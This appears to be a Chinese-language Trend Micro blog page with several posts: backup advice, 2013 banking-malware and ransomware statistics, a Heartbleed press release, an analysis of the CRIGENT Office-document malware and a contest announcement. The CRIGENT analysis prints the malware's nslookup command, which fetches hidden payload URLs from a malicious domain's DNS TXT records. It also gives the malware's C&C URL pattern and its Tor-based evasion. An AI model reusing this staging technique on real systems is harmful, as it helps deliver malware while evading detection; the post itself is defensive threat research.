五個步驟保護你珍貴檔案,數十年不崩壞

趨勢科技 TrendMicro

分享五個步驟來保護你心愛的資料,以防出現讓設備所有者崩潰的各種災難。

以下是保護你數位資產的方式,好讓它們可以陪你走過人生的黃金歲月,長長久久…

經得起時間考驗的五步驟策略

 

步驟一:重要檔案都有兩份以上的副本。

關心於保護自己資料的人可以採用「大量副本以確保安全(LOCKSS)」的作法。

經驗法則是,每個重要檔案都應該以三種形式存在:一份是使用中的檔案,兩份副本。(有些硬派的資料專家會有十份以上的副本。)

 

步驟二:多樣化你的檔案格式和備份方法。

延續LOCKSS,用原始格式來保存每個檔案,再建立至少兩個使用開放標準格式的副本。這些轉換過的副本是以防原始副檔名被淘汰時的保險措施。

而且要避免將你所有的數位雞蛋放在同一個籃子裡,利用各種不同的媒體和可移除式資料儲存設備,像是DVD,外接硬碟,雲端儲存和固態硬碟。

 

步驟三:將媒體儲存分成本地和異地位置。

根據一般常識,你不會希望將所有的資料都放在同一個地方。火災、水災或類似災難都可能在幾分鐘內毀掉你一輩子的工作,所以分散你的資料儲存以做到好的資料災難回復計劃。

另一個比較少被提到的極端想法是:不要忘了跟可信賴的朋友和家人分享檔案。保持自己親密的人在狀況內是個聰明的作法,以防任何不幸發生在自己身上,花個5分鐘來分享檔案是你所可使用快速而簡便的備份作法。

 

步驟四:將資料儲存在黑暗、乾燥和恆溫(22度C)的地方。

數位衰減是不可避免的,無論是多麼理想的儲存條件。不過你可以為你的儲存媒體增加幾年的壽命,如果你將它保護在一個精心維護的環境中。

如果在家中,使用防火及防水的保管箱來防護你的儲存設備。在家庭之外,可以跟銀行租用保管箱或跟私人公司租用安全儲物櫃。

 

步驟五:定期檢查你的檔案和儲存方式以確認保存狀態。

每三到六個月,檢查你的資料備份和所儲存的硬碟。

一旦你發現任何不正常狀況(例如,咖咖聲或回應遲緩),就是時候更換你的設備了。在抹除你的舊設備或破壞儲存硬體前先備份所有資料。

但這帶來了一個亟待解決的問題…

資料儲存設備可以維持多久?

答案取決於它擁有多少的讀/寫週期(即,你可以儲存新資料上去多少次)、使用頻率、儲存媒體存放的方式和產品的品質。

下面所列的壽命是根據製造商的說明,對於每種儲存模式在每週(註)使用和照顧下的假設。

 

1.    固態硬碟(SSD) – 1到2年

在內部和外部的備份方式上,SSD都變得日漸重要,因為它會大幅提升作業系統的性能。

它比一般的硬碟(HDD)要快得多;但是,你也得為這樣的速度付出高昂的代價。根據Lifehacker,60英鎊「可以購買一個120GB的固態硬碟或2TB的一般硬碟」。

需要更多資訊?請參考Lifehacker關於固態硬碟超級有用的介紹

快速提示:固態硬碟不需要硬碟重組。進行這不必要的步驟會耗掉寶貴的讀/寫週期,進而縮短其使用壽命。

2.    外接式硬碟 – 3到5年

大多數外接式硬碟都很快速且簡單易用。它們幾乎都即插即用,只需要針對你的系統進行格式化。

最佳實作建議使用者保有幾個外接式硬碟,以防備份失敗。它們所不喜歡的是高溫、潮濕或掉落。所以要小心輕放。

快速提示:丟掉或捐出你的外接式硬碟前,請務必刪除你的資料。PCWorld給予Eraser很高的評價,這是個可以安全消除設備上所有敏感資料的工具。

3.    USB隨身碟 – 5到15年

很難去擊敗這小傢伙所帶來的效率。它的大小適中,讀/寫迅速,讓隨身碟非常適合其原本的用途:在設備之間傳送資料。

是的,隨身碟的目的是為了臨時性檔案,不是永久性的備份。所以在完成你經得起時間考驗的策略時要記住這一點。

快速提示:找個提供完整安全套件的隨身碟:防毒與密碼保護,全碟加密以及遠端抹除和鎖定功能。

4.    光學儲存媒體(CD/DVD) – 1到300年

當提到CD和DVD的持久性時,它們的確物有所值。便宜的光碟可能只能用到一年,但是高階品牌Delkin Devices聲稱他們的備份解決方案可以長達300年。

即使你決定走中階路線,請不要將光碟存放在光碟包之中,而是將光碟存放在光碟盒中。

在90年代曾經擁有過黑色尼龍專輯的人就會知道熱度、濕度和時間可以對Roxette光碟做出什麼。光碟幾乎融進了它們的塑料封套,而資料永遠消失了。

快速提示:為了延長你光碟的壽命,避免不必要的處理,貼標籤或寫字在上面(簽字筆也不行)。

5.    雲端儲存 待定

雲端儲存的壽命可以跟最原始的資料備份方案一樣長嗎:石碑記事?畢竟這些石板可是堅持了幾千年。

雖然我們還無法確認,但線上雲端儲存是可以加入經得起時間考驗策略的實用作法。它會異地儲存你的資料,而且也非常的方便。一旦你將檔案備份到外面的伺服器,你可以從任何設備存取你的照片、影片、音樂和文件。

雖然有免費的線上備份服務,還是值得去投資一個值得信賴,將安全放在第一位的品牌

快速提示:選擇一個提供銀行級加密的雲端備份服務來保護你珍貴的檔案。

註:除了固態硬碟以外;它是基於每日使用來估算壽命。

 

@原文出處:A 5-step future-proofing strategy to protect your files for decades

向錢看!金融惡意軟體:銀行木馬,勒索軟體不斷開發”新市場”

趨勢科技 TrendMicro

作者:趨勢科技全球安全研究副總裁Rik Ferguson

在2013年,所有媒體和資安研究的焦點都放在目標攻擊的狀況,以及有越來越多組織成為這類攻擊的犧牲品。你可能會認為傳統的使用者層級攻擊活動已經開始勢微了。那你就錯了,而且大錯特錯。

網路犯罪分子的目的還是為了要錢,他們不會管是透過針對商業活動的目標攻擊,還是大量散佈的垃圾郵件(SPAM)活動。他們會在任何可以找到的肥沃土地播下金融惡意軟體的種子。

去年銀行惡意軟體入侵電腦將近100萬次,且不斷開發新市場

趨勢科技在2013年看到銀行惡意軟體用著自2002年後就未曾見過的成長速度在散播著。趨勢科技在這一年裡攔截銀行木馬入侵使用者的電腦將近100萬次。分開來看,2013年的前三季分別是113,000次到220,000次之間,而在最後一季高達了537,000次。罪犯不僅是增加了攻擊數量,同時也在不斷擴大攻擊範圍。

向錢看!金融惡意軟體:銀行木馬,勒索軟體不斷開發”新市場”

 我們看到在某些國家數量的大幅增加,如日本和巴西躋身到前四名,並且也加入了新的目標,包括澳州、法國和德國。日本一般來說不是會出現大量銀行惡意軟體的國家,但我們在2013年第三季和第四季在那裡看到大量而廣泛的ZeuS攻擊活動。

在開發新「市場」之餘,銀行惡意軟體也在開發新技術。特別是在巴西,趨勢科技看到惡意CPL檔案(微軟Windows的控制面板檔案)數量顯著地在增加,內嵌在RTF文件檔裡,和我們之前比較熟悉的傳統附加為ZIP和RAR檔案來傳遞有所不同。

 

2013年勒索軟體年成長一倍,平均每季超過兩萬起攻擊

 不過這還不是全部的銀行惡意軟體。而且去年還有一個地方有著大量回報,那就是勒索軟體 Ransomware體,特別是Cryptolocker趨勢科技客戶偵測到的勒索軟體總數跟前年相較起來增加了一倍,每季平均約偵測到22,000起。當你考慮到每名受害者可能要支付高達300美元或等值貨幣以重新取得自己的資料,這顯然成為網路劫匪頗具潛力的收入來源。

Cryptolocker本身就是一種現有勒索軟體 Ransomware的進化,它改善了加密技術,使用更有效的尋找和加密動作。會在本地端將檔案處理的更難解析,Cryptolocker同時也會找到網路硬碟上的檔案加以加密。不再依賴於簡單的共享密碼來解密付贖金的檔案或系統,Cryptolocker使用公鑰加密,加上非常有效的密鑰長度,讓加密過的檔案幾乎不可能回復。這會讓更多受害者願意去交出現金來換回對自己非常重要的數位寶物。這時候就必須要考慮建置有效而定期的備份解決方案,比以往任何時候都更加重要。 繼續閱讀

< Heartbleed心淌血漏洞偵測工具 > 6000個行動應用App會讓你「心淌血」!趨勢科技「安全達人」替 Android 行動用戶把關

趨勢科技 TrendMicro

高風險App恐洩漏用戶個資      以「生活品味」與「娛樂」類為大宗 

heart bleed for install 0421     

【台北訊】繼上週揭露了會廣泛影響行動 App程式的 Heartbleed漏洞  、以及其可能造成的廣泛危害之後,趨勢科技今(17)日再度公布,目前全球已有高達6000 多種行動App受到波及,其中「生活品味」與「娛樂」App各佔13%,成為受害最嚴重的類別!此外,Android 4.1.1 版作業系統也會受到影響。趨勢科技表示,Heartbleed漏洞的危害遍及各類型的App,用戶應立即安裝可偵測Heartbleed漏洞的手機資安軟體,如趨勢科技安全達人」免費行動防護App等,並立即檢查已下載的App是否安全,才能避免個資或交易資訊被竊取。
heart bleed

趨勢科技資深技術顧問簡勝財表示:「 OpenSSL 加密軟體程式庫的 Heartbeat (心跳) 延伸功能被發現含有一個漏洞稱為Heartbleed漏洞) ,它存在於所有內含 Heartbeat 延伸功能的 OpenSSL 軟體。當伺服器遭此漏洞攻擊時,駭客就能讀取電腦記憶體當中的資料,而且完全不留任何痕跡。」Heartbleed漏洞對用戶造成的影響如下圖:

Heartbleed 500x1500-web_infographic

圖一、Heartbleed漏洞對用戶造成的影響

 

簡勝財進一步指出:「趨勢科技於上週揭露了Heartbleed漏洞後,一直持續監控中,我們發現目前有超過6000 多種 App 程式受到影響,而且遍及各種類型,尤其以『生活品味』和「娛樂」此兩種與消費者日常生活高度連結的App各佔13%為最大宗,為受波及的App類別中第一名!」

 

以下是前十名受波及的行動應用程式App類別:

 前十名受 heart bleed 漏洞波及的行動應用程式App類別

圖二:前十名受波及的行動應用程式 App類別

  繼續閱讀

針對 Word 和 Excel 檔案的病毒家族CRIGENT,利用Windows PowerShell執行惡意行為

趨勢科技 TrendMicro

利用Windows PowerShell感染 Word和 Excel檔案

惡意軟體已經針對 Word和 Excel檔案有好一段日子了,但趨勢科技最近看到一個新的惡意軟體家族 – CRIGENT(也被稱為「Power Worm」)帶來了一些新的技術。(趨勢科技將這些檔案偵測為W97M_CRIGENT.JERX97M_CRIGENT.A。)

最引人注意的並不是建立或包含可執行程式碼,而是 CRIGENT 利用Windows PowerShell來執行其程序。PowerShell是一個功能強大的互動式 shell/腳本工具,可用在Windows的所有現行版本上(而且從Windows 7開始內建);該惡意軟體會透過PowerShell腳本來進行所有行為。因為IT管理員通常會找的是惡意二進位檔而可能會忽略掉它,因為使用這種技術的惡意軟體並不常見。

到達及其他組件

這種威脅會透過一個受感染的Word或Excel文件到達,可能是由其他惡意軟體所植入,或是經由使用者下載/存取。一旦打開,它會馬上從兩個著名的網路匿名專案下載另外兩個組件:Tor 網路以及Polipo,一個個人網頁快取/代理伺服器。

攻擊者會去掩飾這兩個檔案(經由變更它們的檔名),並且隱藏DNS記錄來掩蓋這些檔案的來源。這些檔案放在正常的雲端檔案儲存服務上(在此案例中是Dropbox和OneDrive)。這些檔案的網址被隱藏在DNS記錄中。這是如何做到的?

他會存取兩個不同網域的DNS記錄,並且在每個網域內建立一個子網域。不過他沒有將子網域對應到任何特定的IP地址。相反地,他儲存文字在DNS記錄中,再特別去查詢TXT記錄。(為了逃避本地端的DNS攔截,他會直接查詢Google的公共DNS伺服器),Windows內執行的命令是:

  • nslookup -querytype=TXT {malicious domain} 8.8.8.8

每兩個查詢都會帶回字串,包含了指向正常雲端儲存供應商的網址。其中一個連結指向Dropbox,另外一個指向微軟OneDrive。對於檢查網路流量而沒有查看實際檔案的人來說,只會看到一對連向Google公共DNS伺服器的DNS查詢,並從兩個著名的雲端服務下載檔案。兩者都沒有什麼可疑之處。

命令與控制

利用已安裝的Tor和Polipo軟體,它會存取其命令和控制伺服器。它所用的網址包含兩個GUID,如下所示:

  • {C&C server}/get.php?s=setup&mom={GUID #1}&uid={GUID #2}

 

奇怪的是,如果用缺少或不正確的GUID連上上述網站,C&C伺服器會出現下面這用德文所寫的輕微髒話:

 

圖一、C&C伺服器

繼續閱讀

趨勢科技Codinsanity亞太區程式競賽 開跑!橫跨亞太地區11國 挑戰大數據資料解決能力

趨勢科技 TrendMicro

歡迎大專院校學生及各路程式高手 前來挑戰

【2014年4月17日台北訊】全球雲端安全領導廠商趨勢科技今日宣布,一年一度的 Trend Micro Codinsanity 趨勢科技亞太區程式競賽將於4月21日正式起跑,歡迎學生與在職人士組隊報名。這個以培養軟體程式設計人才為主要目的跨國比賽,今年首度將賽事規模擴大至亞太地區11個國家,參賽對象除了大專院校學生之外,今年更將開放在職人士參加,一同角逐亞洲最佳軟體程式設計盟主的寶座!今年的比賽總獎金高達新台幣150萬,得獎學生並有機會獲得趨勢科技所提供的海外實習機會!

報名網址:https://contest.trendmicro.com/2014/tw/

award 得獎

 有鑑於現今行動裝置與社群媒體,已徹底改變了人們在居家、工作及生活場所中對於科技的應用方式,伴隨著巨量資料的興起,如何透過大數據(Big Data)分析技術、有效地增進數位生活的便利性及企業營運的新契機,將成為今年的比賽主題。趨勢科技Codinsanity亞太區程式競賽,將挑戰參賽者解決巨量資料問題的創意,不論是針對現有的演算法加以強化、開發新的演算法、或是探索新的解決方案以提升資料關聯性等,都可能是參賽者秀出其研發硬底子實力的最佳展現。

 

趨勢科技文化長暨共同創辦人陳怡蓁表示:「今日,我們正生活在一個雲端應用及資料驅動的時代,企業、政府機關的運作與人們的生活方式都已轉型。身為超過25 年經驗的全球雲端資訊安全領導企業,我們一直以巨量資料分析技術為中心,替個人及企業解決棘手的資訊安全問題。從台灣出發的趨勢科技,希望透過舉辦程式競賽,將趨勢研發工程師的全球實戰經驗與參賽的朋友分享,從而鼓勵並培養更多人才加入軟體產業的行列。我們相信亞洲將成為下一個領導資訊科技發展的新勢力,透過此國際級的競賽舞台,讓亞洲各國興趣相投、技術高超的人才齊聚一堂,一同解決真實世界的巨量資料問題,這也將是科技與軟體產業未來創新力、生產力與競爭力的基石。」

繼續閱讀